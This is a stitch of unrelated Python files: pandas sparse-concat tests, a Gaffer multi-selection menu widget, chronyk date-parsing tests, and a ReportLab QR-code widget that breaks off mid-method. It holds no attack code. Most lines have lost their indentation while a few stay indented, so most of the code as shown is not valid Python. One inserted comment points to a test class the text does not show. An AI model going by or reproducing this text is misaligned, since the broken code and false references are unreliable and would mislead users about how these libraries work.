sparse = self.dense1.to_sparse()
sparse3 = self.dense3.to_sparse()
with tm.assert_produces_warning(FutureWarning):
res = pd.concat([sparse, sparse3])
with tm.assert_produces_warning(FutureWarning):
exp = pd.concat([self.dense1, self.dense3])
exp = exp.to_sparse()
tm.assert_sp_frame_equal(res, exp, check_kind=False)
def test_concat_different_columns(self):
# fill_value = np.nan
sparse = self.dense1.to_sparse()
sparse3 = self.dense3.to_sparse()
res = pd.concat([sparse, sparse3], sort=True)
exp = pd.concat([self.dense1, self.dense3], sort=True).to_sparse()
tm.assert_sp_frame_equal(res, exp, check_kind=False)
res = pd.concat([sparse3, sparse], sort=True)
exp = pd.concat([self.dense3, self.dense1], sort=True).to_sparse()
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, check_kind=False)
def test_concat_bug(self):
from pandas.core.sparse.api import SparseDtype
x = pd.SparseDataFrame({"A": pd.SparseArray([np.nan, np.nan],
fill_value=0)})
y = pd.SparseDataFrame({"B": []})
res = pd.concat([x, y], sort=False)[['A']]
exp = pd.DataFrame({"A": pd.SparseArray([np.nan, np.nan],
dtype=SparseDtype(float, 0))})
tm.assert_frame_equal(res, exp)
def test_concat_different_columns_buggy(self):
sparse = self.dense1.to_sparse(fill_value=0)
sparse3 = self.dense3.to_sparse(fill_value=0)
res = pd.concat([sparse, sparse3], sort=True)
exp = (pd.concat([self.dense1, self.dense3], sort=True)
.to_sparse(fill_value=0))
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, check_kind=False,
consolidate_block_indices=True)
res = pd.concat([sparse3, sparse], sort=True)
exp = (pd.concat([self.dense3, self.dense1], sort=True)
.to_sparse(fill_value=0))
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, check_kind=False,
consolidate_block_indices=True)
# different fill values
sparse = self.dense1.to_sparse()
sparse3 = self.dense3.to_sparse(fill_value=0)
        # each column keeps its own fill_value, so compare in dense form
res = pd.concat([sparse, sparse3], sort=True)
exp = pd.concat([self.dense1, self.dense3], sort=True)
assert isinstance(res, pd.SparseDataFrame)
tm.assert_frame_equal(res.to_dense(), exp)
res = pd.concat([sparse3, sparse], sort=True)
exp = pd.concat([self.dense3, self.dense1], sort=True)
assert isinstance(res, pd.SparseDataFrame)
tm.assert_frame_equal(res.to_dense(), exp)
def test_concat_series(self):
# fill_value = np.nan
sparse = self.dense1.to_sparse()
sparse2 = self.dense2.to_sparse()
for col in ['A', 'D']:
res = pd.concat([sparse, sparse2[col]])
exp = pd.concat([self.dense1, self.dense2[col]]).to_sparse()
tm.assert_sp_frame_equal(res, exp, check_kind=False)
res = pd.concat([sparse2[col], sparse])
exp = pd.concat([self.dense2[col], self.dense1]).to_sparse()
tm.assert_sp_frame_equal(res, exp, check_kind=False)
# fill_value = 0
sparse = self.dense1.to_sparse(fill_value=0)
sparse2 = self.dense2.to_sparse(fill_value=0)
for col in ['C', 'D']:
res = pd.concat([sparse, sparse2[col]])
exp = pd.concat([self.dense1,
self.dense2[col]]).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, check_kind=False,
consolidate_block_indices=True)
res = pd.concat([sparse2[col], sparse])
exp = pd.concat([self.dense2[col],
self.dense1]).to_sparse(fill_value=0)
exp['C'] = res['C']
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp, consolidate_block_indices=True,
check_kind=False)
def test_concat_axis1(self):
# fill_value = np.nan
sparse = self.dense1.to_sparse()
sparse3 = self.dense3.to_sparse()
res = pd.concat([sparse, sparse3], axis=1)
exp = pd.concat([self.dense1, self.dense3], axis=1).to_sparse()
tm.assert_sp_frame_equal(res, exp)
res = pd.concat([sparse3, sparse], axis=1)
exp = pd.concat([self.dense3, self.dense1], axis=1).to_sparse()
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp)
# fill_value = 0
sparse = self.dense1.to_sparse(fill_value=0)
sparse3 = self.dense3.to_sparse(fill_value=0)
res = pd.concat([sparse, sparse3], axis=1)
exp = pd.concat([self.dense1, self.dense3],
axis=1).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp)
res = pd.concat([sparse3, sparse], axis=1)
exp = pd.concat([self.dense3, self.dense1],
axis=1).to_sparse(fill_value=0)
exp._default_fill_value = np.nan
tm.assert_sp_frame_equal(res, exp)
# different fill values
sparse = self.dense1.to_sparse()
sparse3 = self.dense3.to_sparse(fill_value=0)
        # each column keeps its own fill_value, so compare in dense form
res = pd.concat([sparse, sparse3], axis=1)
exp = pd.concat([self.dense1, self.dense3], axis=1)
assert isinstance(res, pd.SparseDataFrame)
tm.assert_frame_equal(res.to_dense(), exp)
res = pd.concat([sparse3, sparse], axis=1)
exp = pd.concat([self.dense3, self.dense1], axis=1)
assert isinstance(res, pd.SparseDataFrame)
tm.assert_frame_equal(res.to_dense(), exp)
@pytest.mark.parametrize('fill_value,sparse_idx,dense_idx',
itertools.product([None, 0, 1, np.nan],
[0, 1],
[1, 0]))
def test_concat_sparse_dense_rows(self, fill_value, sparse_idx, dense_idx):
frames = [self.dense1, self.dense2]
sparse_frame = [frames[dense_idx],
frames[sparse_idx].to_sparse(fill_value=fill_value)]
dense_frame = [frames[dense_idx], frames[sparse_idx]]
# This will try both directions sparse + dense and dense + sparse
for _ in range(2):
res = pd.concat(sparse_frame)
exp = pd.concat(dense_frame)
assert isinstance(res, pd.SparseDataFrame)
tm.assert_frame_equal(res.to_dense(), exp)
sparse_frame = sparse_frame[::-1]
dense_frame = dense_frame[::-1]
@pytest.mark.parametrize('fill_value,sparse_idx,dense_idx',
itertools.product([None, 0, 1, np.nan],
[0, 1],
[1, 0]))
@pytest.mark.xfail(reason="The iloc fails and I can't make expected",
strict=False)
def test_concat_sparse_dense_cols(self, fill_value, sparse_idx, dense_idx):
# See GH16874, GH18914 and #18686 for why this should be a DataFrame
from pandas.core.dtypes.common import is_sparse
frames = [self.dense1, self.dense3]
sparse_frame = [frames[dense_idx],
frames[sparse_idx].to_sparse(fill_value=fill_value)]
dense_frame = [frames[dense_idx], frames[sparse_idx]]
# This will try both directions sparse + dense and dense + sparse
for _ in range(2):
res = pd.concat(sparse_frame, axis=1)
exp = pd.concat(dense_frame, axis=1)
cols = [i for (i, x) in enumerate(res.dtypes) if is_sparse(x)]
for col in cols:
exp.iloc[:, col] = exp.iloc[:, col].astype("Sparse")
for column in frames[dense_idx].columns:
if dense_idx == sparse_idx:
tm.assert_frame_equal(res[column], exp[column])
else:
tm.assert_series_equal(res[column], exp[column])
tm.assert_frame_equal(res, exp)
sparse_frame = sparse_frame[::-1]
dense_frame = dense_frame[::-1]
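def _example_concat_uses_first_kind():
    # Illustrative sketch (not an original test): mirrors TestSparseArrayConcat
    # above -- the concatenated result takes its kind from the first input.
    a = pd.SparseArray([1, 0, 0, 2], kind='block')
    b = pd.SparseArray([1, 0, 2, 2], kind='integer')
    return pd.SparseArray._concat_same_type([a, b]).kind  # 'block'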
|
|
##########################################################################
#
# Copyright (c) 2013-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import IECore
import Gaffer
import GafferUI
class MultiSelectionMenu( GafferUI.MenuButton ) :
def __init__(
self,
allowMultipleSelection = False,
allowEmptySelection = True,
**kw
) :
GafferUI.MenuButton.__init__(
self,
menu = GafferUI.Menu( Gaffer.WeakMethod( self.__menuDefinition ) ),
**kw
)
self.__allowMultipleSelection = allowMultipleSelection
self.__allowEmptySelection = allowEmptySelection
self.__selectionChangedSignal = None
self.__menuLabels = []
self.__selectedLabels = []
self.__enabledLabels = []
self.__setDisplayName()
## A signal emitted whenever the selection changes.
def selectionChangedSignal( self ) :
if self.__selectionChangedSignal is None :
self.__selectionChangedSignal = GafferUI.WidgetSignal()
return self.__selectionChangedSignal
## Returns a list of the enabled labels.
def getEnabledItems( self ) :
self.__cleanUpList( self.__enabledLabels, self.__menuLabels ) # Ensure that the selected list is ordered properly.
return self.__enabledLabels
## Sets which items are enabled.
def setEnabledItems( self, labels ) :
input = self.__validateInput( labels )
self.__enabledLabels[:] = input
	## Adds a list of items to the current selection.
	def addSelection( self, labels ) :
		# Remove items that are not in the menu and return the validated list.
		input = self.__validateInput( labels )
		if self.__allowMultipleSelection :
			for label in input :
				if not label in self.__selectedLabels :
					self.__selectedLabels.append( label )
			self.__selectionChanged()
		else :
			if len( input ) > 1 :
				raise RuntimeError("Parameter must be single item or a list with one element.")
			elif len( input ) == 1 :
				# In single selection mode adding an item replaces the current selection.
				self.__selectedLabels[:] = input
				self.__selectionChanged()
		# Remove all selected labels that are not in the menu, emit signals if necessary and update the button.
		self.__validateState()
## Returns a list of the selected labels.
def getSelection( self ) :
self.__cleanUpList( self.__selectedLabels, self.__menuLabels ) # Ensure that the selected list is ordered properly.
return self.__selectedLabels
	## Sets which items are selected.
	# The current selection is replaced with the valid elements of the given list (or single element).
	# If multiple selection is not enabled then passing more than one element raises an error.
def setSelection( self, labels ) :
input = self.__validateInput( labels )
if len( input ) == 0 and not self.__allowEmptySelection :
return
if self.__allowMultipleSelection :
self.__selectedLabels[:] = input
self.__selectionChanged()
else :
if len( input ) > 1 :
raise RuntimeError("Parameter must be single item or a list with one element.")
else :
self.__selectedLabels[:] = input
self.__selectionChanged()
# Remove all selected labels that are not in the menu, emit signals if necessary and update the button.
self.__validateState()
def index( self, item ) :
return self.__menuLabels.index( item )
# Append a new item or list of items to the menu.
def append( self, labels ) :
if isinstance( labels, list ) :
for label in labels :
if not label in self.__menuLabels :
self.__menuLabels.append( label )
self.__enabledLabels.append( label )
else :
if not labels in self.__menuLabels :
self.__menuLabels.append( labels )
self.__enabledLabels.append( labels )
def remove( self, label ) :
if label in self.__menuLabels :
self.__menuLabels.remove(label)
self.__validateState()
def insert( self, index, label ) :
if not label in self.__menuLabels :
self.__menuLabels.insert( index, label )
self.__enabledLabels.insert( index, label )
##############################################
# Private Methods
#############################################
def __validateInput( self, labels ) :
if isinstance( labels, list ) :
validInput = labels
elif isinstance( labels, str) :
validInput = [ labels ]
else :
validInput = list( labels )
self.__cleanUpList( validInput, self.__menuLabels )
return validInput
## The slot which is called when an item is clicked on.
def __selectClicked( self, label, selected=None ) :
if self.__allowMultipleSelection :
if selected == True :
self.addSelection( label )
else :
if not self.__allowEmptySelection :
if len( self.__selectedLabels ) > 1 :
self.__selectedLabels.remove( label )
self.__selectionChanged()
else :
self.__selectedLabels.remove( label )
self.__selectionChanged()
else :
			# Check the mode we are in. If an empty selection is allowed and the label
			# is already selected then clicking it again deselects it.
if label in self.__selectedLabels and self.__allowEmptySelection :
self.__selectedLabels = []
self.__validateState()
self.__selectionChanged()
else :
self.setSelection( label )
## Updates the button's text and emits the selectionChangedSignal.
def __selectionChanged( self ) :
self.__setDisplayName()
self.selectionChangedSignal()( self )
def __menuDefinition( self ) :
m = IECore.MenuDefinition()
for label in self.__menuLabels :
menuPath = label
if not menuPath.startswith( "/" ):
menuPath = "/" + menuPath
m.append(
menuPath,
{
"command" : functools.partial( Gaffer.WeakMethod( self.__selectClicked ), label ),
"active" : label in self.__enabledLabels,
"checkBox" : ( ( self.__allowMultipleSelection ) or ( not self.__allowMultipleSelection and self.__allowEmptySelection ) ) and label in self.__selectedLabels
}
)
return m
	## Checks that the internal lists are up-to-date and ordered correctly.
	# If a label that was selected has been removed then the selectionChanged signal is emitted
	# and the button's name is updated accordingly.
def __validateState( self ) :
		# Remove duplicates from the list whilst preserving its order.
seen = set()
seen_add = seen.add
self.__menuLabels[:] = [ x for x in self.__menuLabels if x not in seen and not seen_add(x)]
# Now we check that the enabled and selected lists are in order and without duplicates. If duplicates are
# found or their entry does not exist within self.__menuLabels then they are removed and the relevant signals emitted.
if self.__cleanUpList( self.__selectedLabels, self.__menuLabels ) :
self.__selectionChanged()
self.__cleanUpList( self.__enabledLabels , self.__menuLabels )
		# If we don't allow an empty selection then make sure that at least one item is selected!
if not self.__allowEmptySelection and len( self.__selectedLabels ) == 0 :
if len( self.__enabledLabels ) > 0 :
self.__selectedLabels.append( self.__enabledLabels[0] )
elif len( self.__menuLabels ) > 0 :
self.__selectedLabels.append( self.__menuLabels[0] )
self.__selectionChanged()
	## A simple method to make sure that the passed list only holds
	# elements that also appear in l2. It also orders the elements to match l2
	# and ensures that there are no duplicate entries.
	# Returns True if the list was changed.
def __cleanUpList( self, l, l2 ) :
oldLength = len(l)
seen = set()
seen_add = seen.add
l[:] = [ x for x in l2 if x not in seen and not seen_add(x) and x in l ]
return len(l) != oldLength
def __contains__( self, label ):
return label in self.__menuLabels
def __len__( self ) :
return len( self.__menuLabels )
def __delitem__( self, index ) :
if isinstance( index, slice ) :
del self.__menuLabels[index]
self.__validateState()
else :
label = self.__menuLabels[index]
self.remove(label)
self.__validateState()
def __setitem__( self, index, value ) :
if isinstance( index, slice ) :
s = list( value[index.start:index.stop] )
self.__menuLabels[index.start:index.stop] = s
self.__enabledLabels = self.__enabledLabels + s
self.__validateState()
else :
if value not in self.__menuLabels :
self.__menuLabels[index] = value
self.__enabledLabels.append( value )
self.__validateState()
def __repr__( self ) :
return self.__menuLabels.__repr__()
def __getitem__( self, index ) :
return self.__menuLabels[index]
def __setDisplayName( self ) :
name = "..."
nEntries = len( self.__menuLabels )
nSelected = len( self.__selectedLabels )
if nEntries == 0 :
name = "None"
elif nSelected == 0 :
name = "None"
elif nSelected == 1 :
name = self.getSelection()[0]
elif nSelected == nEntries :
name = "All"
self.setText( name )
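# Illustrative usage sketch (assumes a running GafferUI application providing
# the event loop; connection handling follows the conventions of the Gaffer
# version this widget targets):
#
#     menu = MultiSelectionMenu( allowMultipleSelection = True )
#     menu.append( [ "A", "B", "C" ] )
#     menu.setSelection( [ "A", "C" ] )
#     connection = menu.selectionChangedSignal().connect( lambda widget : None )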
|
|
#!/usr/bin/env python3
import pytest
import sys
import time
import calendar
import datetime
from chronyk import LOCALTZ, Chronyk, ChronykDelta, currentutc, guesstype, DateRangeError
def isEqual(time1, time2):
return abs(time1 - time2) < 0.1
###############################################################################
def test_currentutc():
currentutc()
def test_guesstype():
assert guesstype(9001) == Chronyk(9001)
assert guesstype("2 hours ago").relativestring() == Chronyk("2 hours ago").relativestring()
assert guesstype("2 hours") == ChronykDelta("2 hours")
def test_empty_con():
assert isEqual(Chronyk().timestamp(), time.time())
def test_none_con():
assert isEqual(Chronyk(None).timestamp(), Chronyk(time.time()).timestamp())
def test_common_strings():
c1 = Chronyk("today").relativestring()
c2 = Chronyk("now").relativestring()
c3 = Chronyk("this week").relativestring()
c4 = Chronyk("this month").relativestring()
c5 = Chronyk("this day").relativestring()
assert c1 == c2 and c2 == c3 and c3 == c4 and c4 == c5
def test_yesterday():
assert Chronyk("yesterday").relativestring() == "yesterday"
def test_yesteryear():
assert Chronyk("yesteryear").relativestring() == Chronyk("1 year ago").relativestring()
# TEST PRE-EPOCH DATES
def test_pre_epoch_1():
assert Chronyk(datetime.datetime(1950, 1, 1)).datetime() == datetime.datetime(1950, 1, 1)
def test_pre_epoch_2():
assert Chronyk(time.strptime("1950 01 01", "%Y %m %d")).timestring("%Y %m %d") == "1950 01 01"
# ABSOLUTE STRINGS
def test_absolute_iso():
t = Chronyk("2014-09-18 11:24:47")
assert t.ctime() == "Thu Sep 18 11:24:47 2014"
def test_absolute_iso_date():
t = Chronyk("2014-09-18")
assert t.ctime() == "Thu Sep 18 00:00:00 2014"
def test_absolute_written_1():
t = Chronyk("May 2nd, 2015")
assert t.ctime() == "Sat May 2 00:00:00 2015"
def test_absolute_written_2():
t = Chronyk("2. August 2010")
assert t.ctime() == "Mon Aug 2 00:00:00 2010"
def test_absolute_12hr():
t = Chronyk("11:14 am")
assert t.ctime()[11:-5] == "11:14:00"
def test_absolute_12hr_seconds():
t = Chronyk("11:14:32 am")
assert t.ctime()[11:-5] == "11:14:32"
def test_absolute_24hr():
t = Chronyk("17:14")
assert t.ctime()[11:-5] == "17:14:00"
def test_absolute_24hr_seconds():
t = Chronyk("17:14:32")
assert t.ctime()[11:-5] == "17:14:32"
def test_absolute_value():
with pytest.raises(ValueError):
Chronyk("warglblargl")
# RELATIVE STRINGS
def test_relative_now():
assert Chronyk().relativestring() == "just now"
def test_relative_seconds_1():
assert Chronyk("2 seconds ago").relativestring() == "just now"
def test_relative_seconds_2():
assert Chronyk("in 5 seconds").relativestring() == "just now"
def test_relative_seconds_3():
timest = time.time()
assert Chronyk(timest - 5).relativestring(now=timest, minimum=0) == "5 seconds ago"
def test_relative_minutes_1():
assert Chronyk("1 minute ago").relativestring() == "1 minute ago"
def test_relative_minutes_2():
assert Chronyk("in 2 minutes").relativestring() == "in 2 minutes"
def test_relative_hours_1():
assert Chronyk("1 hour ago").relativestring() == "1 hour ago"
def test_relative_hours_2():
assert Chronyk("in 2 hours").relativestring() == "in 2 hours"
def test_relative_days_1():
assert Chronyk("10 days ago").relativestring() == "10 days ago"
def test_relative_days_2():
assert Chronyk("in 20 days").relativestring() == "in 20 days"
def test_relative_weeks_1():
assert Chronyk("1 week ago").relativestring() == "7 days ago"
def test_relative_weeks_2():
assert Chronyk("in 2 weeks").relativestring() == "in 14 days"
def test_relative_weeks_3():
assert Chronyk("in blurgh weeks and 2 days").relativestring() == "in 2 days"
def test_relative_months_1():
assert Chronyk("overninethousand months and 2 days ago").relativestring() == "2 days ago"
def test_relative_months_2():
dati = datetime.datetime.utcnow()
newmonth = (((dati.month - 1) + 4) % 12) + 1
newyear = dati.year + int(((dati.month - 1) + 4) / 12)
newday = dati.day
while newday > calendar.monthrange(newyear, newmonth)[1]:
newday -= 1
dati = dati.replace(year=newyear, month=newmonth, day=newday)
timestr = time.strftime("%Y-%m-%d", dati.timetuple())
assert Chronyk("in 4 months", timezone=0).relativestring() == timestr
def test_relative_years_1():
assert Chronyk("something years and 2 days ago").relativestring() == "2 days ago"
def test_relative_years_2():
dati = datetime.datetime.utcnow()
dati = dati.replace(year=dati.year - 2)
timestr = time.strftime("%Y-%m-%d", dati.timetuple())
assert Chronyk("2 years ago").relativestring() == timestr
def test_struct():
timestr = time.localtime()
assert Chronyk(timestr).timestamp() == time.mktime(timestr)
def test_valid_1():
Chronyk("2 hours ago", allowfuture=False, allowpast=True)
def test_valid_2():
Chronyk("in 2 hours", allowfuture=True, allowpast=False)
def test_valid_3():
with pytest.raises(DateRangeError):
Chronyk("2 hours ago", allowpast=False)
def test_valid_4():
with pytest.raises(DateRangeError):
Chronyk("in 2 hours", allowfuture=False)
def test_typeerror():
with pytest.raises(TypeError):
Chronyk(["this", "should", "throw", "TypeError"])
def test_datetime():
timest = currentutc()
assert Chronyk(timest, timezone=0).datetime() == datetime.datetime.fromtimestamp(timest)
def test_date():
timest = currentutc()
assert Chronyk(timest, timezone=0).date() == datetime.date.fromtimestamp(timest)
def test_timest_1():
timest = time.time()
assert Chronyk(timest).timestamp() == timest
def test_timest_2():
timest = time.time()
assert Chronyk(timest, timezone=0).timestamp(timezone=-7200) == timest + 7200
def test_timest_3():
timest = time.time()
assert Chronyk(timest, timezone=-7200).timestamp(timezone=0) == timest - 7200
def test_timestring_1():
timest = time.time()
assert Chronyk(timest).timestring() == time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(timest - LOCALTZ))
def test_timestring_2():
timest = time.time()
assert Chronyk(timest).timestring("%Y-%m-%d") == time.strftime("%Y-%m-%d", time.gmtime(timest - LOCALTZ))
def test_operators_eq():
timest = time.time()
assert Chronyk(timest) - 5 == Chronyk(timest - 5) and Chronyk(timest, timezone=0) == timest
def test_operators_str():
t = Chronyk()
assert str(t) == t.timestring()
def test_operators_num():
timest = time.time()
t = Chronyk(timest, timezone=0)
assert int(timest) == int(t) and int(t) == int(float(t))
def test_operators_ne():
timest = time.time()
assert Chronyk(timest) != Chronyk(timest - 2)
def test_operators_ltgt():
timest = time.time()
assert Chronyk(timest) > Chronyk(timest - 5)
assert Chronyk(timest, timezone=0) > timest - 5
assert Chronyk(timest) < Chronyk(timest + 5)
assert Chronyk(timest, timezone=0) < timest + 5
assert Chronyk(timest) <= Chronyk(timest)
assert Chronyk(timest, timezone=0) <= timest
assert Chronyk(timest) >= Chronyk(timest - 5)
assert Chronyk(timest, timezone=0) >= timest - 5
def test_operators_add():
timest = time.time()
assert Chronyk(timest) + ChronykDelta(5) == Chronyk(timest + 5)
assert Chronyk(timest) + 5 == Chronyk(timest + 5)
def test_operators_sub():
timest = time.time()
assert Chronyk(timest) - Chronyk(timest - 5) == ChronykDelta(5)
assert Chronyk(timest) - ChronykDelta(5) == Chronyk(timest - 5)
assert Chronyk(timest, timezone=0) - 5 == timest - 5
def test_delta_type():
with pytest.raises(TypeError):
ChronykDelta(["WEEE", "EEEEE", "EEEEEE"])
def test_delta_timestring_1():
assert ChronykDelta("5 hours").timestring() == "5 hours"
def test_delta_timestring_2():
assert ChronykDelta("1 week").timestring() == "7 days"
def test_delta_timestring_3():
assert ChronykDelta("1 hour").timestring() == "1 hour"
def test_delta_timestring_4():
assert ChronykDelta("1 day and 12 hours").timestring() == "1 day and 12 hours"
def test_delta_timestring_5():
assert ChronykDelta("1 day and 12 hours").timestring(maxunits=1) == "1 day"
def test_delta_timestring_6():
with pytest.raises(ValueError):
ChronykDelta("1 day ago").timestring(maxunits=0)
def test_delta_timestring_7():
assert ChronykDelta(0).timestring() == ""
def test_delta_operators_str():
assert ChronykDelta(5).timestring() == str(ChronykDelta(5))
def test_delta_operators_num():
assert 5 == int(ChronykDelta(5)) and int(ChronykDelta(5)) == float(ChronykDelta(5))
def test_delta_operators_eq():
assert ChronykDelta(5) == ChronykDelta(5) and ChronykDelta(5) == 5
def test_delta_operators_neq():
assert ChronykDelta(5) != ChronykDelta(6) and ChronykDelta(5) != 3
def test_delta_operators_ltgt():
assert ChronykDelta(5) > ChronykDelta(4) and ChronykDelta(5) > 3
assert ChronykDelta(5) < ChronykDelta(7) and ChronykDelta(5) < 9
assert ChronykDelta(5) >= ChronykDelta(5) and ChronykDelta(5) >= 3
assert ChronykDelta(5) <= 5 and ChronykDelta(5) <= ChronykDelta(6)
def test_delta_operators_add():
timest = time.time()
assert ChronykDelta(5) + ChronykDelta(-5) == 0
assert ChronykDelta(5) + Chronyk(timest) == Chronyk(timest + 5)
assert ChronykDelta(5) + 10 == 15
def test_delta_operators_sub():
assert ChronykDelta(5) - 5 == 0
assert ChronykDelta(5) - ChronykDelta(1) == 4
def test_delta_operators_mul():
assert ChronykDelta(12) * 2 == 24
def test_delta_operators_div():
assert ChronykDelta(10) / 2 == 5
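def example_relative_roundtrip():
    # Illustrative sketch (not an original test): the same API exercised above,
    # parsing a relative time string and rendering it back as a relative string.
    return Chronyk("2 days ago").relativestring()  # e.g. "2 days ago"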
if __name__ == "__main__":
sys.exit(pytest.main())
|
|
# QRCode for Python
#
# Ported from the Javascript library by Sam Curren
# ReportLab module by German M. Bravo
#
# QRCode for Javascript
# http://d-project.googlecode.com/svn/trunk/misc/qrcode/js/qrcode.js
#
# Copyright (c) 2009 Kazuhiko Arase
#
# URL: http://www.d-project.com/
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
# The word "QR Code" is registered trademark of
# DENSO WAVE INCORPORATED
# http://www.denso-wave.com/qrcode/faqpatent-e.html
__all__=(
'QrCodeWidget',
)
import math, re
from itertools import zip_longest
from reportlab.graphics.shapes import Group, Rect
from reportlab.lib import colors
from reportlab.lib.validators import isNumber, isColor, isString, Validator
from reportlab.lib.attrmap import *
from reportlab.graphics.charts.areas import PlotArea
from reportlab.lib.units import mm
class isLevel(Validator):
def test(self,x):
# level L : About 7% or less errors can be corrected.
# level M : About 15% or less errors can be corrected.
# level Q : About 25% or less errors can be corrected.
# level H : About 30% or less errors can be corrected.
return type(x) is str and len(x)==1 and x in ['L', 'M', 'Q', 'H']
isLevel = isLevel()
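# Shadowing the validator class with an instance mirrors the reportlab
# convention (isNumber, isColor and isString imported above are instances too).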
class QrCodeWidget(PlotArea):
codeName = "QR"
_attrMap = AttrMap(BASE=PlotArea,
value = AttrMapValue(isString, desc='the text'),
x = AttrMapValue(isNumber, desc='x-coord'),
y = AttrMapValue(isNumber, desc='y-coord'),
barFillColor = AttrMapValue(isColor, desc='bar color'),
barWidth = AttrMapValue(isNumber, desc='Width of bars.'), # maybe should be named just width?
barHeight = AttrMapValue(isNumber, desc='Height of bars.'), # maybe should be named just height?
barStrokeWidth = AttrMapValue(isNumber, desc='Width of bar borders.'), # maybe removed?
barStrokeColor = AttrMapValue(isColor, desc='Color of bar borders.'), # maybe removed?
barBorder = AttrMapValue(isNumber, desc='Width of QR border.'), # maybe should be named qrBorder?
barLevel = AttrMapValue(isLevel, desc='QR Code level.'), # maybe should be named qrLevel
)
x = 0
y = 0
barFillColor = colors.black
barStrokeColor = None
barStrokeWidth = 0
barHeight = 32*mm
barWidth = 32*mm
barBorder = 4
barLevel = 'L'
def __init__(self,value='Hello World',**kw):
self.value=value
for k, v in kw.items():
setattr(self, k, v)
def wrap(self,aW,aH):
return self.width,self.height
def draw(self):
g = Group()
gAdd = g.add
barWidth = self.barWidth
barHeight = self.barHeight
x = self.x
y = self.y
gAdd(Rect(x,y,barWidth,barHeight,fillColor=None,strokeColor=None,strokeWidth=0))
barFillColor = self.barFillColor
barStrokeWidth = self.barStrokeWidth
barStrokeColor = self.barStrokeColor
barBorder = self.barBorder
correctLevel = {
'L': QRErrorCorrectLevel.L,
'M': QRErrorCorrectLevel.M,
'Q': QRErrorCorrectLevel.Q,
'H': QRErrorCorrectLevel.H,
}[self.barLevel]
qr = QRCode(None, correctLevel)
qr.addData(self.value)
qr.make()
moduleCount = qr.getModuleCount()
boxsize = min(barWidth, barHeight) / (moduleCount + barBorder * 2)
offsetX = (barWidth - min(barWidth, barHeight)) / 2
offsetY = (min(barWidth, barHeight) - barHeight) / 2
for r in range(moduleCount):
for c in range(moduleCount):
if (qr.isDark(r, c) ):
x = (c + barBorder) * boxsize
y = (r + barBorder+1) * boxsize
qrect = Rect(offsetX+x,offsetY+barHeight-y,boxsize,boxsize,fillColor=barFillColor,strokeWidth=barStrokeWidth,strokeColor=barStrokeColor)
gAdd(qrect)
return g
class QRMode:
MODE_NUMBER = 1 << 0
MODE_ALPHA_NUM = 1 << 1
MODE_8BIT_BYTE = 1 << 2
MODE_KANJI = 1 << 3
class QR:
def __init__(self, data):
if self.valid:
            # re.escape keeps characters like '-' literal inside the character class.
            if not re.search('^[%s]+$' % re.escape(self.valid), data):
raise ValueError
else:
self.valid = ''.join(chr(c) for c in range(256))
self.data = data
def getLength(self):
return len(self.data)
def __repr__(self):
return self.data
    def write(self, buffer):
        # map(None, ...) was a Python 2 idiom; zip_longest gives the same
        # None-padded grouping of the data into chunks of self.group items.
        for g in zip_longest(*[iter(self.data)] * self.group):
bits = 0
n = 0
for i in range(self.group):
if g[i] is not None:
n *= len(self.valid)
n += self.valid.index(g[i])
bits += self.bits[i]
buffer.put(n, bits)
class QRNumber(QR):
valid = '0123456789'
bits = (4,3,3)
group = 3
mode = QRMode.MODE_NUMBER
class QRAlphaNum(QR):
valid = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ $%*+-./:'
bits = (6,5)
group = 2
mode = QRMode.MODE_ALPHA_NUM
class QR8bitByte(QR):
valid = None #''.join(chr(c) for c in range(256))
bits = (8,)
group = 1
mode = QRMode.MODE_8BIT_BYTE
def write(self, buffer):
for c in self.data:
buffer.put(ord(c), 8)
class QRKanji(QR):
valid = None
bits = (8,)
group = 1
mode = QRMode.MODE_KANJI
class QRCode:
def __init__(self, typeNumber, errorCorrectLevel):
self.typeNumber = typeNumber
self.errorCorrectLevel = errorCorrectLevel
self.modules = None
self.moduleCount = 0
self.dataCache = None
self.dataList = []
def addData(self, data):
try :
newData = QRNumber(data)
except ValueError:
try:
newData = QRAlphaNum(data)
except ValueError:
try:
newData = QR8bitByte(data)
except ValueError:
try:
newData = QRKanji(data)
except:
raise
self.dataList.append(newData)
self.dataCache = None
def isDark(self, row, col):
if (row < 0 or self.moduleCount <= row or col < 0 or self.moduleCount <= col):
raise Exception("%s,%s - %s" % (row, col, self.moduleCount))
return self.modules[row][col]
def getModuleCount(self):
return self.moduleCount
def make(self):
if self.typeNumber is None:
